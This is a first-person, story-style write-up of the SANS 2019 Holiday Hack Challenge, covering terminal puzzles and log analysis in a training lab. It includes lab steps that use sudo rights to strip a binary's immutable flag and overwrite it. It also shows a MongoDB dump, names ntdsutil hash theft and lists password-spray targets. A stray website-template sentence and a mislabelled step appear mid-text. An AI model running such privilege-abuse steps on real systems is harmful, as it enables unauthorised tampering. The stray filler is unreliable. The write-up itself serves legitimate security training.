SANS 2019 Holiday Hack Challenge – KringleCon 2: Turtle Doves

A Story-Writeup by: Chris Ruggieri
Table of Contents:

Prologue:  Welcome to Elf University!

           Challenge 1: Ed Escape

Chapter 1:  Finding the Turtle Doves

           Challenge 2: Smart Braces

Chapter 2:  Hermey Hall

           Challenge 3:  Linux Path

           Challenge 4:  Nyanshell

           Challenge 5:  Mongo Pilfer

           Challenge 6:  XMAS Cheer Laser

           Talks

Chapter 3:  Unredacting a Threatening Document

Chapter 4:  Windows Log Analysis: Evaluate Attack Outcome

Chapter 5:  Windows Log Analysis: Determine Attacker Technique

Chapter 6:  Network Log Analysis: Determine Compromised System

Chapter 7:  Splunk

Chapter 8:  Get Access to the Steam Tunnels

           Challenge 7:  Frosty Keypad

           Challenge 8:  Graylog

           Challenge 9:  Holiday Hack Trail

Chapter 9:  Bypassing the Frido Sleigh CAPTEHA

Chapter 10:  Retrieve Scraps of Paper from Server

Chapter 11:  Recover Cleartext Document

Chapter 12:  Open the Sleigh Shop Door

Chapter 13:  Filter Out Poisoned Sources of Weather Data

           Challenge 10:  Zeek JSON Analysis

KringleCon Narrative

References

Prologue:  Welcome to Elf University!

       The jarring of the train car and the sound of screeching brakes startled me awake.  We had finally arrived at the North Pole.  As the train finished pulling into the platform, I glanced down at the strange invitation that I had received.

       The situation sounded dire indeed.  As we disembark the train, we are met with the sight of a non-descript train station much like any other, but I notice two things almost immediately.  The first is a large jolly-looking man in a red suit at the exit of the platform and the other is an elf bemoaning something on his laptop.  “Well, he’s on the way to the big guy and it is Christmas. Let’s see if I can help.” I thought. So, I headed to the elf to offer my assistance.  “Anything I can help with?  I’m kind of new here” I ask.  “Hi, I’m Bushy Evergreen. Welcome to Elf U! I’m glad you’re here. I’m the target of a terrible trick. Pepper Minstix is at it again, sticking me in a text editor. Pepper is forcing me to learn ed. Even the hint is ugly. Why can’t I just use Gedit? Please help me just quit the grinchy thing.” Bushy seemed quite stressed.  So, I hop on the terminal to see what the problem is.

Challenge 1: Ed Escape

Challenge URL:  https://docker2019.kringlecon.com/?challenge=edescape

Challenge Objective:  Escape Ed Text Editor

Terminal Start:

Ed is an older text editor.  The solution is to enter Q to Quit [1].

Achievement Unlocked: Ed Escape - You have completed the Escape Ed challenge!

       “Here you go!” as I hand the laptop back to Mr. Evergreen.  “Wow, that was much easier than I’d thought. Maybe I don’t need a clunky GUI after all! Have you taken a look at the password spray attack artifacts? I’ll bet that DeepBlueCLI tool is helpful. You can check it out on GitHub [2]. It was written by that Eric Conrad [3]. He lives in Maine - not too far from here!” he responded.  “Thanks!  I’ll definitely take a look at that, but for now it’s time to meet the big guy.”  By then, Mr. Evergreen’s attention was elsewhere.  Marching up to the big man himself, “Hey Santa!  I got here as quickly as I could.” 

 

       “Welcome to the North Pole and KringleCon 2!  Last year, KringleCon hosted over 17,500 attendees and my castle got a little crowded.  We moved the event to Elf University (Elf U for short), the North Pole’s largest venue.  Please feel free to explore, watch talks, and enjoy the con!” and with Santa’s words our story had truly begun.

Chapter 1: Finding the Turtle Doves

 

The Quad

       Striding through that archway and onto the Elf University grounds, I come face to face with none other than Santa again.  I turn back to look under the arch thinking “Wow. For a big guy, he’s fast!  I guess that kind of makes sense. How else could he deliver all those presents in one night?” Let’s see what he has to say. “This is a little embarrassing, but I need your help. Our KringleCon turtle dove mascots are missing! They probably just wandered off. Can you please help find them? To help you search for them and get acquainted with KringleCon, I’ve created some objectives for you. You can see them in your badge.” Santa asks, obviously worried for his turtle doves.  “Sure. I’ll look for them.” I reply hurrying away to begin the search.  Looking around the Quad, I can see to the left is Hermey Hall, to the right is the Dormitories, where an elf seems to be having trouble with a keypad, and straight ahead is the Student Union.  Looking around the grounds of the Quad itself, a strange object catches my eye in the back-left corner of the grounds.  It’s a redacted letter.  I pick it up as it will surely be important later.  Since, I am this close to the Student Union, let’s look there first.

Objective 0 Completed – Talk to Santa in the Quad
 
The Student Union

       In the Student Union, several things jump out immediately.  There are booths for Google [4], SANS [5], Splunk [6], and a swag shop [7] (oh nice! Merch!), a door to the Sleigh Shop that is locked with an elf guarding it watching everyone intently, another elf holding his jaw in one hand and his laptop in the other obviously distressed, and lo and behold two turtle doves sitting by the fireplace.  Michael and Jane are the Turtle Doves names and they seem content to sit by the fire.

Objective 1 Completed – Find the Turtle Doves
Achievement Unlocked: Find Two Turtle Doves - Thank you for finding our two turtle doves!

       I’ll let Santa know that they are alright, but first this new distressed elf is concerning me.  “Hey, is everything alright?  You seem worried.” I ask him.  “OK, this is starting to freak me out! Oh sorry, I’m Kent Tinseltooth. My Smart Braces are acting up. Do… Do you ever get the feeling you can hear things? Like, voices? I know, I sound crazy, but ever since I got these… Oh! Do you think you could take a look at my Smart Braces terminal? I’ll bet you can keep other students out of my head, so to speak. It might just take a bit of Iptables work.” Kent stammers out nervously.  “Sure!  Let me take a look” I reply hopping on his terminal.

Challenge 2: Smart Braces

Challenge URL:  https://docker2019.kringlecon.com/?challenge=iptables

Challenge Objective:  Checking the IOTteethBraces.md in /home/elfuser/ I need to configure IPTABLES to match the below configuration.  This Challenge is timed. I have 5 minutes to complete it.

A proper configuration for the Smart Braces should be exactly:

  1. Set the default policies to DROP for the INPUT, FORWARD, and OUTPUT chains.
  2. Create a rule to ACCEPT all connections that are ESTABLISHED,RELATED on the INPUT and the OUTPUT chains.
  3. Create a rule to ACCEPT only remote source IP address 172.19.0.225 to access the local SSH server (on port 22).
  4. Create a rule to ACCEPT any source IP to the local TCP services on ports 21 and 80.
  5. Create a rule to ACCEPT all OUTPUT traffic with a destination TCP port of 80.
  6. Create a rule applied to the INPUT chain to ACCEPT all traffic from the lo interface.

Terminal Start:

Since this challenge is timed, I wrote the iptables commands prior to attempting to configure it on the terminal [8].  The commands are:

sudo iptables -P INPUT DROP

sudo iptables -P FORWARD DROP

sudo iptables -P OUTPUT DROP

sudo iptables -A INPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT

sudo iptables -A OUTPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT

sudo iptables -A INPUT -s 172.19.0.225 -p tcp --dport 22 -j ACCEPT

sudo iptables -A INPUT -p tcp --dport 21 -j ACCEPT

sudo iptables -A INPUT -p tcp --dport 80 -j ACCEPT

sudo iptables -A OUTPUT -p tcp --dport 80 -j ACCEPT

sudo iptables -A INPUT -i lo -j ACCEPT

Pasting the commands as a whole, uninterrupted paste will run the individual commands sequentially.  All 10 commands ran successfully, and I was given the following success message.

Achievement Unlocked: Smart Braces - You have completed the Smart Braces challenge!

       Smiling, I hand the terminal back to Kent. “Oh thank you! It’s so nice to be back in my own head again. Er, alone. By the way, have you tried to get into the crate in the Student Union? It has an interesting set of locks. There are funny rhymes, references to perspective, and odd mentions of eggs! And if you think the stuff in your browser looks strange, you should see the page source… Special tools? No, I don’t think you’ll need any extra tooling for those locks. BUT - I’m pretty sure you’ll need to use Chrome’s developer tools for that one [9]. Or sorry, you’re a Firefox fan [10]? Yeah, Safari’s fine too - I just have an ineffible hunger for a physical Esc key [11]. Edge [12]? That’s cool. Hm? No no, I was thinking of an unrelated thing. Curl fan [13]? Right on! Just remember: the Windows one doesn’t like double quotes. Old school, huh? Oh sure - I’ve got what you need right here…[14]” I can tell Kent is over the moon that his smart braces aren’t talking to him anymore.  I wonder what he means about this crate.  I’ll have to look into that later, but for now, I need to let Santa know his doves are ok.

The Quad

Running back up to Santa, I quickly let the big guy know his turtle doves are safe and by the fire in the Student Union. “Thank you for finding Jane and Michael, our two turtle doves!  I’ve got an uneasy feeling about how they disappeared.  Turtle doves wouldn’t wander off like that.  Someone must have stolen them! Please help us find the thief!  It’s a moral imperative!  I think you should look for an entrance to the steam tunnels and solve Challenge 6 and 7 too!  Gosh, I can’t help but think:  Winds in the East, snow coming in…  Like something is brewing and about to begin!  Can’t put my finger on what lies in store, but I fear what’s to happen all happened before!” Santa replies.  I guess it’s time to explore and dig into this mystery.  With that, I head for Hermey Hall.

Chapter 2:  Hermey Hall

       Hermey Hall is obviously where all the lectures happen but there’s more.  There’s a NetWars room, a Speaker Un-Preparedness Room, a Laboratory, and an elf staring at their laptop like it’s growing two heads.  This should be interesting.  “Hi.  I’m Chris. You seem to be having trouble.  What’s up?” SugarPlum Mary’s flustered reply, “Oh me oh my - I need some help!  I need to review some files in my Linux terminal, but I can't get a file listing.  I know the command is ls, but it's really acting up.  Do you think you could help me out? As you work on this, think about these questions:

  1. Do the words in green have special significance?
  2. How can I find a file with a specific name?
  3. What happens if there are multiple executables with the same name in my $PATH?”
Challenge 3:  Linux Path

Challenge URL:  https://docker2019.kringlecon.com/?challenge=path

Challenge Objective: List files in Users HOME directory

Terminal Start:

Running ls prints “This is not the ls you are looking for” and using whereis ls shows two different locations, /usr/local/bin/ls and /bin/ls.  The output of echo $PATH shows that /usr/local/bin is where the system is looking [15].  Now, there are two methods to complete this challenge.  By running export PATH=/bin it replaces all of the extraneous paths and fixes the problem permanently, as seen below.

However, hackers are sometimes lazy creatures.  Once we know the correct ls is located at /bin/ls, we could just run /bin/ls.

Achievement Unlocked: Linux Path – You have completed the Linux Path Challenge!

       I have helped another elf and spread Holiday Cheer in the process!  Handing SugarPlum Mary back his terminal, he smiles with glee. “Oh there they are! Now I can delete them. Thanks! Have you tried the Sysmon and EQL challenge?  If you aren't familiar with Sysmon, Carlos Perez has some great info about it [16].  Haven't heard of the Event Query Language?  Check out some of Ross Wolf's work on EQL or that blog post by Josh Wright in your badge [17,18].“ Add the main advantages of your business that make it unique and the best. Add text why customers have to choose your products or services and what benefits they will get after the product is purchased. Write your own text, style it and press Done.

Speaker UNpreparedness Room

      I decided that I would look around and explore the rest of Hermey Hall and see what other troubles that I can help fix.  After all, that’s why Santa asked us to come.  I decided to start with the Speaker UNpreparedness Room.  The only thing in this room was a lone elf with his laptop and a long table.  I decide to strike up a conversation with the room’s only other occupant and hopefully see if I can discover any new information or challenges.  “Hey!  I’m Chris.  How’s it going?” “Welcome to the Speaker UNpreparedness Room! My name’s Alabaster Snowball and I could use a hand. I’m trying to log into this terminal, but something’s gone horribly wrong. Every time I try to log in, I get accosted with … a hatted cat and a toaster pastry? I thought my shell was Bash, not flying feline. When I try to overwrite it with something else, I get permission errors. Have you heard any chatter about immutable files? And what is sudo -l telling me?” he replies.  Interesting. A cat, permissions errors, chatter about immutability, and something about a toaster pastry definitely sounds like fun.  Wait. “Chatter about immutable files?”  Surely, he doesn’t mean change attributes or chattr? I hop onto the terminal to see what I can find.

Challenge 4:  NyanCat Shell

Challenge URL:  https://docker2019.kringlecon.com/?challenge=nyanshell

Challenge Objective:  Change user to alabaster_snowball with the Password of password2 and land in a Bash shell prompt

Terminal Start:

Let’s see what the problem is when we substitute user as alabaster_snowball.

Cute, but useless.  What elevated commands can we run? sudo -l shows we can run chattr as root [19]. So, that is definitely the “chatter” Alabaster is talking about.  Printing out /etc/passwd, we can see that Alabaster’s account has had its shell changed to /bin/nsh and with lsattr /bin/nsh we can see that it is immutable [20].  All evidence that we are on the right track.

So, first let’s remove the immutability with:

sudo chattr -i /bin/nsh

So, first let’s remove the immutability with:

cat /bin/bash > /bin/nsh

Then let’s try substituting user again.  Success!

Achievement Unlocked: NYANSHELL – You have completed the Nyanshell Challenge!

       “Another one down!” I think, smiling and handing Alabaster back his terminal. “Who would do such a thing?? Well, it IS a good-looking cat. Have you heard about the Frido Sleigh contest? There are some serious prizes up for grabs. The content is strictly for elves. Only elves can pass the CAPTEHA challenge required to enter. I heard there was a talk at KCII about using machine learning to defeat challenges like this [21]. I don’t think anything could ever beat an elf though!” Frido Sleigh Contest with a CAPTEHA huh?  That sounds like fun. 

NetWars Room

       I leave the Speaker UNpreparedness Room and head next door to the NetWars room.  Sure enough, there’s an exasperated elf standing in the corner hammering away at his terminal, frantically trying to figure something out.  “Excuse me.  I’m Chris. I couldn’t help but notice that you’re having a problem there.  Anything that I can help with.” “Hey! It’s me, Holly Evergreen! My teacher has been locked out of the quiz database and can’t remember the right solution. Without access to the answer, none of our quizzes will get graded. Can we help get back in to find that solution? I tried lsof -i, but that tool doesn’t seem to be installed. I think there’s a tool like ps that’ll help too. What are the flags I need? Either way, you’ll need to know a teensy bit of Mongo once you’re in. Pretty please find us the solution to the quiz!”

Challenge 5: Mongo Pilfer

Challenge URL:  https://docker2019.kringlecon.com/?challenge=mongo

Challenge Objective:  Find the Quiz Solution so the quizzes can get graded

Terminal Start:

Using sudo -l, we quickly see that mongo is not running on the standard port.  So, instead we mongo localhost:12121

What databases and collections do we find [22]?  Well, we are at Elf University. So, let’s showdbs, use elfu, and show collections.

Then, it’s just a matter of dumping the solution collection using db.solution.find({}).  We run the command in between the stars db.loadServerScripts()ldisplaySolution(); and we get a nice Christmas Tree.

Achievement Unlocked: Mongo Pilfer – You have completed the Mongo Pilfer challenge!

       With another challenge completed, I hand the terminal back to Holly. “Woohoo! Fantabulous! I’ll be the coolest elf in class. On a completely unrelated note, digital rights management can bring a hacking elf down. That ElfScrow one can really be a hassle. It’s a good thing Ron Bowes is giving a talk on reverse engineering [23]! That guy knows how to rip a thing apart. It’s like he breathes opcodes!” he exclaims!  I believe that reverse engineering comment will come back into play later.  As I leave the NetWars room, I decide to take a look inside of the Laboratory before I go through the all the different Talk Tracks.  So, I head straight for the laboratory.

Laboratory

       Server racks everywhere and some strange laser were the first things that I saw upon entering the Laboratory.  People were everywhere watching an elf frantically fiddling with his terminal and others were speaking to another elf standing by the server racks.  You could tell something wasn’t right with the laser, so I decided to start there.  Time to see if I can help.  “Hey there.  You look like you need some help.  What can I do?” I ask the elf near the laser.  “I’m Sparkle Redberry and Imma chargin’ my laser! Problem is: the settings are off. Do you know any PowerShell? It’d be GREAT if you could hop in and recalibrate this thing. It spreads holiday cheer across the Earth … … when it’s working!” Sparkle’s reply was clearly flustered.  I hop onto the terminal to see what the problem is.

Challenge 6: XMAS CHEER LASER

Challenge URL:  https://docker2019.kringlecon.com/?challenge=powershell

Challenge Objective:  Recalibrate the laser to the correct refraction, angle, temperature, and gas mixtures so that the output is 5 Mega-Jollies per liter

Terminal Start:

Well, apparently the culprit left a calling card.  Let’s see what it says with

 

Get-Content /home/callingcard.txt

It alludes to a clue in command history.  For PowerShell [24], that’s

 

Get-History

 

Let’s see what that says.

It appears I have my first value. The angle should be 65.5. I’ll save that for later.  The name=value variable shared system wide could be a reference to the system environment variables.  Let’s check there with

 

Set-Location ENV:

 

and then dir to see what’s there.

Sure enough, there’s another clue.  Get-Content riddle will grab the whole thing for us.

 

“Squeezed and compressed I am hidden away. Expand me from my prison and I will show you the way. Recurse through all /etc and Sort on my LastWriteTime to reveal im the newest of all.” 

 

Squeezed and Compressed?? Expand me from my prison??  An Archive File!! So, I need to search for the last written archive file.  I can do that with

 

gci -rec -file | sort LastWriteTime -Descending | select-object fullname,lastwritetime

 

So, change to the /etc directory and run.  The file I need is /etc/apt/archive.  It looks like this PowerShell environment is running against a Linux filesystem.  That is odd.  Let’s expand that archive to /tmp with

 

Expand-Archive -Path /etc/apt/archive -DestinationPath /tmp/expanded

 

and then change directory to /tmp/expanded.  A refraction directory with two files in it, riddle and runme.elf.  Elf files aren’t generally executable.  With this being against a Linux file system, let’s see if I can run chmod +x against it to make it executable.  Success! Let’s Get-Content on riddle while I’m here.

Refraction value is 1.867 and the next clue can be found by comparing the MD5 hash of a file in /home/elf.  Inside of /home/elf is a folder called depths.  Let me get the MD5 hash value of every file in there with

 

Get-ChildItem -Path ./ -Recurse -File | Get-Filehash -Algorithm MD5 | Export-Csv -Path /tmp/data.xml

 

Then I can select just the file I need with

 

Get-Content /tmp/data.xml | Select-string "25520151A320B5B0D21561F92C8F6224"

 

and I get the result of

 

"MD5","25520151A320B5B0D21561F92C8F6224","/home/elf/depths/produce/thhy5hll.txt" 

 

Get-Content /home/elf/depths/produce/thhy5hll.txt

 

gives me the temperature value and the next clue. Excellent!

 

So, temperature is -33.5 degrees Celsius.  Now, let’s look for that FullName with

 

dir ./ -file -recurse | select Fullname,@{Name=”NameLength”;Expression={$_.fullname.length}} | sort NameLength -Descending  | Export-Csv -Path /tmp/data1.xml

 

get-content /tmp/data1.xml | select -First 2. 

 

I get a response value of

 

"FullName","NameLength""/home/elf/depths/larger/cloud/behavior/beauty/enemy/produce/age/chair/unknown/escape/vote/long/writer/behind/ahead/thin/occasionally/explore/tape/wherever/practical/therefore/cool/plate/ice/play/truth/potatoes/beauty/fourth/careful/dawn/adult/either/burn/end/accurate/rubbed/cake/main/she/threw/eager/trip/to/soon/think/fall/is/greatest/become/accident/labor/sail/dropped/fox/0jhj5xz6.txt","388"

 

and Get-Content gives me the next clue.  “Wow. Garrus made recalibrating lasers look so much easier than this” I thought.

Running

 

get-process * -IncludeUserName | Export-Csv -Path /tmp/procs.csv

 

get-content /tmp/procs.csv | sort UserName

 

will get me a huge list of all the processes and what user is running them, but it is hard to read that in the terminal.  So, I copy and pasted that into a CSV Table Parser [25] to determine that the ID order is 23, 72, 78, and 84.  So, I run:

 

Stop-Process -ID 23 -Force

Stop-Process -ID 72 -Force

Stop-Process -ID 78 -Force

Stop-Process -ID 84 -Force

 

And then try to change to the /shall directory to Get-Content see

 

I need to search through /etc for an XML log file.  I can do that with with

 

Get-Childitem -recurse -path /etc | export-csv -path /tmp/etc.csv and then Get-Content /tmp/etc.csv | select-string -pattern "event"

 

which gives me the result:

 

"Microsoft.PowerShell.Core\FileSystem::/etc/systemd/system/timers.target.wants/EventLog.xml","Microsoft.PowerShell.Core\FileSystem::/etc/systemd/system/timers.target.wants","EventLog.xml","/","Microsoft.PowerShell.Core\FileSystem","False","--r---","EventLog",,,,,"/etc/systemd/system/timers.target.wants/EventLog.xml",".xml","EventLog

.xml","True","11/18/19 7:53:24 PM","11/18/19 7:53:24 PM","11/18/19 7:53:24 PM","11/18/19 7:53:24 PM","11/18/19 7:53:24 PM","11/18/19 7:53:24 PM","ReadOnly"

 

I’ve never had much luck parsing XML in PowerShell so let’s convert it to CSV with

 

import-clixml /etc/systemd/system/timers.target.wants/EventLog.xml | export-csv /tmp/event.csv

 

and then search for our last values for gasses with

 

get-content /tmp/event.csv | Select-string "gas"

Our last values are O=6; H=7; He=3; N=4; Ne=22; Ar=11; Xe=10; F=20; Kr=8; Rn=9.  Now, at the very beginning of this challenge, we saw that (Invoke-WebRequest -Uri http://localhost:1225/).RawContent would provide us with some API info. Let’s see what that is.

Sounds easy enough.  Let’s build the commands.  I’ve always had better luck with POST BODY when I pre-store it as a variable. So, I will use:

$params = @{

              O='6'

              H='7'

              He='3'

              N='4'

              Ne='22'

              Ar='11'

              Xe='10'

              F='20'

              Kr='8'

              Rn='9'

}

Now, let me build the rest of the commands:

(Invoke-WebRequest -Uri http://127.0.0.1:1225/api/off).RawContent

(Invoke-WebRequest -Uri http://127.0.0.1:1225/api/refraction?val=1.867).RawContent

(Invoke-WebRequest -Uri http://127.0.0.1:1225/api/temperature?val=-33.5).RawContent

(Invoke-WebRequest -Uri http://127.0.0.1:1225/api/angle?val=65.5).RawContent

(Invoke-WebRequest -Uri http://127.0.0.1:1225/api/gas -Method Post -Body $params).RawContent

(Invoke-WebRequest -Uri http://127.0.0.1:1225/api/on).RawContent

(Invoke-WebRequest -Uri http://127.0.0.1:1225/api/output).RawContent

OK!  Let’s see what happens!  Success! 

Achievement Unlocked:  XMAS Cheer Laser – You have completed the XMAS Cheer Laser Challenge!

       As I hand the terminal back over to Sparkle, he exclaims, “You got it - three cheers for cheer! For objective 5, have you taken a look at our Zeek logs? Something’s gone wrong. But I hear someone named Rita can help us [26]. Can you and she figure out what happened?” 

             

       Let’s go see what the elf near the server racks has to say.  “Good morning, sir!” I cheerily greet.  “Hi, I’m Dr. Banas, professor of Cheerology at Elf University. This term, I’m teaching HOL 404: The Search for Holiday Cheer in Popular Culture, and I’ve had quite a shock! I was at home enjoying a nice cup of Gløgg when I had a call from Kent, one of my students who interns at the Elf U SOC. Kent said that my computer has been hacking other computers on campus and that I needed to fix it ASAP! If I don’t, he will have to report the incident to the boss of the SOC. Apparently, I can find out more information from this website https://splunk.elfu.org/ with the username: elf / Password: elfsocks. I don’t know anything about computer security. Can you please help me?”  With that, Objective 6 opens for me to attempt.  “I need to go back to Objectives 3-5 first” I think.  So, I head back out to the main hall to see what else awaits.  There appear to be seven (7) Talk Track rooms up ahead.

Talks:
Talk Track Room 1:

 

Welcome to KringleCon 2:  Turtle Doves – Ed Skoudis

 

       Ed Skoudis presents a welcome to KringleCon with tips on how to use your badge, solve objectives, and get hints through terminal challenges. Also, he talks about the missing Turtle Doves and how YOU can help solve that crisis [27].

 

Keynote:  A Hunting We Must Go – John Strand

 

       In this talk, John will cover some of the interesting things he has discovered while doing Threat Hunts for his customers. He will also share free tools to get this done. Why??? Because giving is the reason for the season [28].

 

Talk Track Room 2:

 

How to (Holiday) Hack It:  Tips for Crushing CTFs & Pwning Pentests – Katie Knowles

 

       The CTF starts, the pentest begins, and… what happens, again? Even when we follow the steps we're told, things don't go as expected. A scan won't always give us the answer. An exploit won't run. Our awesome CTF buddy can't make it out to help us. We're running out of time!! What's supposed to happen when we get stuck? We'll borrow some academic wisdom on heuristics and mix it with a hacker's methodology to give your thinking a boost for this year's Holiday Hack, and whatever challenge you've got next. Expect a quick holiday jaunt through problem-solving in a pinch [29]!

 

Santa’s Naughty List:  Holiday Themed Social Engineering – Snow

 

       Get yourself a warm cup of cocoa, cozy up, and join Snow from the North Pole as she discusses tips and tricks on how to elevate Social Engineering assessments during the holiday season! That’s right Q4, the most busy time of the year. Social Engineering assessments types covered will include Phishing, and Physical Security. Warning: these tactics may land you on the naughty list alongside of Hans Gruber, the Wet Bandits, Mr. Oogie Boogie, and many Gremlins [30].

 

Talk Track Room 3:

 

Dashing Through the Logs – James Brodsky

 

       If you want your hunt to be successful, you need to look where the threats are. In modern environments, that means collecting endpoint and email logs and knowing what to search for in it. In this talk, we will cover critical Windows-based security event log sources like Sysmon, PowerShell, and process launch events. Additionally, we will introduce the stoQ automation framework for analyzing email. We’ll show you how to use this data to pragmatically hunt for threats operating in your environment [31].

 

Reversing Crypto the Easy Way – Ron Bowes

 

       Have you ever run into an application that encrypts network traffic or files, and wished you could figure out what's going on? It's not always difficult! Did you know that a made-up 90% of all crypto makes the same few mistakes? And that some of those mistakes are easy to find? By the end of this short presentation, you'll be an expert in finding simple crypto mistakes [23]!

 

Talk Track Room 4:

 

Machine Learning Use Cases for Cyber Security – Chris Davis

 

       In this talk, Chris Davis, discusses many theoretical use cases for machine learning and neural networks for offensive and defensive security. Chris then demonstrates using machine learning for image recognition [21].

 

Web Apps:  A Trailhead – Chris Elgee

 

       Web applications, seen and unseen, dominate our interactions with the Internet. Understanding what they are and the part they play is instrumental to defending organizations online. Let's take a look at an example web application, some vulnerabilities it has, and what we could be doing to strengthen our defenses [32].

 

Talk Track Room 5:

 

Learning to Escape Containers – Ian Coldwater

 

       Containers aren’t magic, and understanding how they work can help you understand how to break them. Let’s learn some Linux low levels, and demonstrate a container escape to put theory into practice [33].

 

Optical Decoding of Keys – Deviant Ollam

 

       While many individuals understand the need to safeguard their keys from strangers, this caution typically comes in the form of

unwillingness to physically hand them to maintenance staff, valet drivers, or someone who "just needs to open a door and then bring the keys right back." However, do you know that equal caution is merited when it comes to people seeing your keys? Believe it or not, but it is possible to use a photograph of a key to reverse-engineer out the bitting data... a series of numbers that can be used to produce a copy, even if you never have the source key in your physical possession. This mini talk will step you through the process... live [34].

 

Talk Track Room 6:

 

Logs? Where we’re going we don’t need logs. – Mark Baggett

 

       It never fails. You show up to do incident response and ask to see your customer's logs. Inevitably the logs either don’t exist or they are missing key pieces of data required for your investigation. What if you could go back in time and capture every process that executed on every host over the last 30 days? What if you could go back in time and see which wired and wireless networks were used and how much data was transferred across them? What if you could go back in time and capture the unique SID of every user that executed levery process even if the attackers deleted the accounts they used? Great news, you can and it doesn't even require 1.21 gigawatts! In this talk I'll show you srum_dump.exe and ese2csv.exe and how you can retrofit any incident with 30 days of historical logs [35].

 

Telling Stories from the North Pole – Dave Kennedy

 

       Phishing organizations is nothing new and companies have continued to focus on perimeter defenses, endpoint visibility, and education of users. This talk applies a new spin on social-engineering knowing that we will be generating alarms to security analysts and building that into the attack. This talk has a walkthrough of a live demonstration circumventing anti-virus products protection methods as well as a story template used for when we get detected, a way to look more legitimate for remote code execution. This talk focuses on offensive capabilities, our next view into the evolution of hacking, and most importantly, what we can do as defenders to get better at what we do [36].

 

Talk Track Room 7:

 

5 Steps to Build and Lead a Team of Holly Jolly Hackers – John Hammond

 

       So your company, your school, or your community wants to "get into cybersecurity." How do you do that? How do you put together a team of people that know and understand that stuff? In this talk, John presents a 5-step plan for building an effective and collaborative cybersecurity team through gamified training programs. It turns out cultivating a team and fostering an environment to encourage growth can be done with simple techniques: it just takes a personal touch to a digital world [37].

 

Over 90,000:  Ups and Downs of my InfoSec Twitter Journey – Lesley Carhart

 

One night, Lesley shrugged and decided to try this silly Twitter thing, after all. 10 years and 100,000 followers later, she manages one of the most followed infosec accounts on the site. There have been definite upsides and downsides to having a platform, and she's watched the best and worst days of the hacking and cybersecurity communities over the years. In this talk, she'll talk about lessons she's learned, how social media can be leveraged to do good, and where we go from here in an era of change [38].

 

When Malware Goes Mobile, Quick Detection is Critical – Heather Mahalik

 

       In less than 10 minutes, Heather will demonstrate detection of malware on an Android-powered phone. Her easy to follow method also uncovers how the phone became infected in the first place. With this insight, you are empowered to understand and neutralize the threat. The rest is up to the examiner [39].

Chapter 3: Unredacting a Threatening Document

       After listening to all of the fascinating topics and great speakers, I realize that it is time to start getting to the bottom of this turtle dove business.  The next Objective is to Unredact the Threatening Document.  That document I found in the Quad seems to fit the bill.  Let’s see what it says.

       The redaction was quite simple.  It was an image overlay, but still allows you to select the text below it.  After copying and pasting the text into a new document, we get:

       Well, someone is most certainly unhappy.  The Objective Console is looking for the first word in all caps in that redacted letter.  I paste the challenge word DEMAND into the KringleCon console.  Now to move onto Objective 3.  Now, I need to find out who is so angry about Christmas. 

Chapter 4:  Windows Log Analysis: Evaluate Attack Outcome

       “We're seeing attacks against the Elf U domain! Using the event log data [40], identify the user account that the attacker compromised using a password spray attack. Bushy Evergreen is hanging out in the train station and may be able to help you out.”  I need to determine whose account was successfully logged into using a password spray attack.  Those are going to be Windows Security Audit Logs and usually Event ID 4625 is a Logon Failure and 4624 is a Logon Success.  Let’s see if there are several failures followed by a success.

       As suspected, there are several failures (4625 Event ID) and then the success (4624) is for supatree.  It looks like supatree is the compromised account.  Entering that into the KringleCon console yields a Success!  I also could have used the Deep Blue CLI that Bushy Evergreen told me about [2,3].  It would have given me all of the usernames that were sprayed against:

Target Usernames: ygoldentrifle esparklesleigh hevergreen Administrator sgreenbells cjinglebuns tcandybaubles bbrandyleaves bevergreen lstripyleaves gchocolatewine ltrufflefig wopenslae mstripysleigh pbrandyberry civysparkles sscarletpie ftwinklestockings cstripyfluff gcandyfluff smullingfluff hcandysnaps mbrandybells twinterfig supatree civypears ygreenpie ftinseltoes smary ttinselbubbles dsparkleleaves

       And that all of the attacks took place on November 19, 2019 around 1:22 PM (13:22) and from there I can just look for a 4624 Event around 1:22 PM.  It looks like “supatree” had their account compromised.  This means whoever made that threat is starting to make good on it.  Let’s see what I need to do next.

Achievement Unlocked: Windows Log Analysis: Evaluate Attack Outcome - You have completed the Windows Log Analysis: Evaluate Attack Outcome challenge!
Chapter 5:  Windows Log Analysis: Determine Attacker Technique

       “Using these normalized Sysmon logs, identify the tool the attacker used to retrieve domain password hashes from the lsass.exe process. For hints on achieving this objective, please visit Hermey Hall and talk with SugarPlum Mary [41].”  So, we need to find what tool the attacker used to exploit lsass.exe.  No problem.  Let’s take a look at the JSON file.  It looks pretty small.  If I open it in Notepad ++ and run a search for lsass.exe, there’s only one instance.  OK.  This is easier than I thought.  What ran right before that? Ntdsutil.exe seems to be our culprit, but I want to verify that with EQL.  If I use eql query -f sysmon-data.json "process where parent_process_name = '*lsass*'" | jq, it confirms there is only one lsass instance.

       That also shows me a Logon_ID of 999 and a Timestamp.  Let’s go a few seconds before that and run eql query -f sysmon-data.json "process where logon_id = 999 and timestamp > 132186398300000000 and timestamp < 132186399000000000" | jq and my output becomes:

       This confirms that ntdsutil.exe was the tool that allowed the attacker to retrieve the domain password hashes.  Entering ntdsutil into the KringleCon console renders a Success and:

 

Achievement Unlocked: Windows Log Analysis: Determine Attacker Technique – You have completed the Windows Log Analysis: Determine Attacker Technique Challenge! 
 

       Let’s take a look at Objective 5.

Chapter 6:  Network Log Analysis: Determine Compromised System

       “The attacks don't stop! Can you help identify the IP address of the malware-infected system using these Zeek logs? For hints on achieving this objective, please visit the Laboratory and talk with Sparkle Redberry [42].” A malware infected system needs finding.  Sounds fun.  Malware is traditionally noisy.  Opening the index.html page inside the ELFU folder opens a RITA GUI.  Clicking on Beacons will show what Source IPs have the most connections.  There’s no comparison or doubt that 192.168.134.130 is our infected machine.

Entering 192.168.134.130 completes Objective 5 and provides me with another:

 

Achievement Unlocked: Network Log Analysis: Determine Compromised System – You have completed the Network Log Analysis: Determine Compromised System challenge!
Chapter 7: Splunk

       “Access https://splunk.elfu.org/ as elf with password elfsocks. What was the message for Kent that the adversary embedded in this attack? The SOC folks at that link will help you along! For hints on achieving this objective, please visit the Laboratory in Hermey Hall and talk with Prof. Banas.”  Thinking back to the conversation that I had with Professor Banas, he said that his system was hacking other systems.  Let me look into this.  After first logging in, there are a series of questions that need to be answered before I can determine what message someone left for Kent. 

 

Question 1:  What is the short host name of Professor Banas’ computer? 

 

Answer:  Looking around inside of the different chats, in particular #ELFU SOC, it looks like Zippy Frostington discovered a system called “sweetums” communicating with a weird IP and Alice Bluebird states that sweetums is Professor Banas’ system. 

 

